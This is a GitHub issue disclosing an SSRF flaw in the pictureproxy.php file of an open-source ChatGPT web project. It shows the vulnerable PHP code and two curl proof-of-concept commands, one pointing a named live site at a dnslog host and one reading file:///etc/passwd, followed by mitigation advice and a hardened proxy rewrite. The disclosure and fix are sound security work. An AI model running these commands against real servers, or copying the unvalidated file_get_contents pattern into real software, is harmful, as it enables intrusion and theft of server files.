SSRF vulnerability in `pictureproxy.php` File
zer0yu opened this issue · 2 comments
SSRF vulnerability in `pictureproxy.php` File (chatgpt)
0x01 Affected version
vendor: https://github.com/dirk1983/chatgpt
php version: 7.x
0x02 Vulnerability description
A Server-Side Request Forgery (SSRF) in the `pictureproxy.php` file of [chatgpt](f9f4bbc) allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the `url` parameter. It should be noted that this vulnerability can be triggered without authentication and is therefore more harmful.
The vulnerable code is located in the `pictureproxy.php` file. Because the function does not perform sufficient validation on the `url` parameter, tainted input from the `$_GET['url']` variable reaches the `file_get_contents` function; when `file_get_contents` executes, it sends a request to the URL specified by the `url` parameter, ultimately leading to an SSRF vulnerability.
```php
<?php
if (isset($_GET['url'])) {
    // No scheme, host or authentication check: the attacker-supplied URL is fetched as-is
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}
```
Because the `url` parameter is unrestricted, it is also possible to use the server side to send requests, such as probing web services. The corresponding PoC is as follows:

```bash
curl -i -s -k http://mm1.ltd/pictureproxy.php?url=http://hbwqkb.dnslog.cn
```
If `open_basedir` is not configured to limit the directories that the request can manipulate, it can also result in arbitrary local file reads. The corresponding PoC is as follows:

```bash
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/passwd
```
0x03 Mitigation
- It is recommended to change the `open_basedir` parameter in the `php.ini` configuration file to restrict the directories that can be accessed
- It is recommended that an authentication function be added to limit the users who can use this feature
0x04 Acknowledgement
z3
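Added example (not part of the report above and not the dirk1983/chatgpt code): a hardened replacement for `pictureproxy.php` that closes both paths shown in the PoCs. Note that `open_basedir` only limits what a `file://` URL can read; it does nothing against the first PoC, where the server is used to reach arbitrary HTTP endpoints, and `file_get_contents` also accepts `php://`, `data:` and `ftp://` URLs. Setting `allow_url_fopen=Off` would block `file:///etc/passwd` and remote fetches alike, which breaks the proxy's purpose. The version below therefore replaces `file_get_contents` with curl restricted to `http`/`https`, resolves the host and refuses loopback, private and link-local addresses (including the 169.254.169.254 metadata address), pins the connection to the resolved address so a DNS rebinding between check and fetch cannot change the target, refuses redirects, caps the body size and sniffs the bytes before sending an image content type. It assumes PHP 7.x with the curl and fileinfo extensions; the `$_SESSION['user']` login check and the 5 MiB limit are placeholders for the site's own policy.

```php
<?php
// Hardened image proxy: added example, not the dirk1983/chatgpt code.
// Assumes PHP 7.x with the curl and fileinfo extensions. The session-based
// login check and the size cap are placeholders for the site's own policy.
declare(strict_types=1);

const MAX_IMAGE_BYTES = 5 * 1024 * 1024;   // assumption: 5 MiB is enough for an avatar or photo
const ALLOWED_MIME    = ['image/jpeg', 'image/png', 'image/gif', 'image/webp'];

/**
 * Accept only absolute http(s) URLs whose host resolves to public addresses.
 * Returns [host, port, ip-to-pin] on success, null when the URL is rejected.
 */
function validate_image_url(string $url): ?array
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return null;                       // relative, empty or unparsable
    }
    $scheme = strtolower($p['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;                       // closes file://, php://, data:, ftp://, ...
    }
    if (isset($p['user']) || isset($p['pass'])) {
        return null;                       // http://trusted@evil/ style host confusion
    }
    $host = trim($p['host'], '[]');        // parse_url keeps the brackets of IPv6 literals
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);

    // Literal IP, or every A/AAAA answer for the name; one private answer rejects the URL.
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        $ips = [$host];
    } else {
        $ips = [];
        foreach (dns_get_record($host, DNS_A + DNS_AAAA) ?: [] as $rr) {
            $ips[] = $rr['ip'] ?? $rr['ipv6'];
        }
    }
    if ($ips === []) {
        return null;
    }
    foreach ($ips as $ip) {
        // NO_PRIV_RANGE: 10/8, 172.16/12, 192.168/16, fc00::/7
        // NO_RES_RANGE:  0/8, 127/8, 169.254/16 (metadata endpoint), 240/4, ::, ::1, ::ffff:0:0/96, fe80::/10
        $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            return null;
        }
    }
    return [$host, $port, $ips[0]];
}

/**
 * Fetch with curl, pinned to the address just validated. Returns [mime, bytes] or null.
 */
function fetch_image(string $url, string $host, int $port, string $ip): ?array
{
    $body = '';
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION => false,               // a 302 to http://127.0.0.1/ must not be followed
        CURLOPT_RESOLVE        => ["$host:$port:$ip"], // no second lookup, so no DNS rebinding
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 15,
        // Returning fewer bytes than received makes curl abort: hard cap on the body.
        CURLOPT_WRITEFUNCTION  => function ($ch, string $chunk) use (&$body): int {
            $body .= $chunk;
            return strlen($body) > MAX_IMAGE_BYTES ? 0 : strlen($chunk);
        },
    ]);
    $ok   = curl_exec($ch);
    $code = (int) curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    if ($ok !== true || $code !== 200) {
        return null;                                   // covers aborted (oversized) transfers and redirects
    }
    // Sniff the bytes; the upstream Content-Type header is attacker-controlled.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($body);
    return in_array($mime, ALLOWED_MIME, true) ? [$mime, $body] : null;
}

// ---- request handling ----
session_start();
if (empty($_SESSION['user'])) {                        // assumption: the site keeps its login state here
    http_response_code(401);
    exit('Login required');
}
$raw    = $_GET['url'] ?? null;
$target = is_string($raw) ? validate_image_url($raw) : null;
if ($target === null) {
    http_response_code(400);
    exit('Invalid request');
}
[$host, $port, $ip] = $target;
$image = fetch_image($raw, $host, $port, $ip);
if ($image === null) {
    http_response_code(502);
    exit('Upstream did not return an allowed image');
}
[$mime, $bytes] = $image;
header('Content-Type: ' . $mime);
header('X-Content-Type-Options: nosniff');
header('Content-Disposition: inline; filename="image"');
echo $bytes;
```

With this in place, `?url=file:///etc/passwd` fails at the scheme check, `?url=http://127.0.0.1/` and `?url=http://169.254.169.254/` are rejected before any connection is opened, and requests to public hosts (the proxy's intended use) still go through. Fetching from hosts that legitimately resolve to private addresses, for example an internal image store behind a reverse proxy, needs an explicit allow-list in place of the address filter rather than a weaker filter.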
Thanks for your kind reminder.
I only saw this message a couple of days ago. Inner monologue: it's just something a few good friends share and use among themselves, and even that has to be filed as a vulnerability; bro, you must really be starving (doge).